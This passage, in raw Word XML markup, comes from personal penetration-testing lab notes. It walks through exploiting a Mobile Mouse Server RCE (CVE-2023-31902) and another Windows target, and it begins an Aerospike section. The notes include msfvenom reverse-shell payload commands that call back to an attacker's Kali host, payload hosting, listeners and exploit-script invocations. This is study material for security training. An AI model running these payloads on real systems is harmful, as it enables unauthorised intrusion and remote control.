    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="266"/>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target-ip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the IP of the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="266"/>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local-http-server-ip</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the IP of our Kali, since we need to host HTTP server with a reverse shell on it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="266"/>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payload-name</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the name of our reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386E">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First, we have to start a HTTP server on our Kali. We can use python!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000386F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26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python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003870">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Then, we can create a reverse shell inside of the directory where python is hosted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003871">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26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msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.232 LPORT=4444 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003872">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3873">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26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-lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003874">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Now we can run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003875">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="266"/>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 50972.py 192.168.236.145 192.168.45.232 reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003876">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We should have shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003877">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003878">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003879">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mknfx6ofc4x2" w:id="528"/>
      <w:bookmarkEnd w:id="528"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mobile Mouse Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-C .155 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on port 9099</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">First, I looked at the NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>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016000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="195" name="image198.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image198.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1222"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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387E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This looks like there is a Mobile Mouse Server on port 9099. The Mouse Server applications are usually vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000387F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, I searched up Mobile Mouse Server exploit and found Mobile Mouse 3.6.0.4 RCE which is CVE-2023-31902</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003880">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I first tried exploitDB 51010, but that didn't work. It didn't even successfully download the rev shell I was hosting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003881">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, I looked at Discord, and found this more stable exploit:</w:t>
      </w:r>
      <w:hyperlink r:id="rId1223">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1224">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/KryoCeph/Mobile-Mouse-3.6.0.4-Exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The way it works is it works in 2 steps: an upload and then a execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003883">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I first made a rev shell that connected to port 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003884">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82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msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.232 LPORT=80 -f exe &gt; reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003885">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then if you read the source code on the exploit, it tries to download a file from your Kali using port 8080. So start a python host on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003886">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82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python3 -m http.server 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003887">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, you download upload.py, and then use it to upload the rev shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003888">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82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upload.py --target 192.168.239.155 --file reverse.exe --lhost 192.168.45.197</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003889">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if your python host says that someone tried downloading your reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="144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388B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="82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penelope -p 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you download execute.py and then use it to execute the uploaded reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="825"/>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execute.py --target 192.168.239.155 --file reverse.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="825"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it should work!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000388F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003890">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003891">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003892">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003893">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yubb81q1emxw" w:id="529"/>
      <w:bookmarkEnd w:id="529"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aerospike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003894">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003895">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> XXXXXXXXX-A .143</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003896">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003897">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This was an aerospike 5.0.1.1 exploit (I hear it also works on 5.0.1.3 and anything below)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003898">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the exploitDB, it says "Version: &lt; 5.1.0.3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003899">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Anyways, there were two ways to find out about aerospike</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first way was to ffuf the website, see an API endpoint that was forbidden, ffuf that endpoint, see heartbeat endpoint, look at it, and then see Aerospike is running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u</w:t>
      </w:r>
      <w:hyperlink r:id="rId1225">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1226">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.183.143:80/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-words.txt -fc 403</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf the entire site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
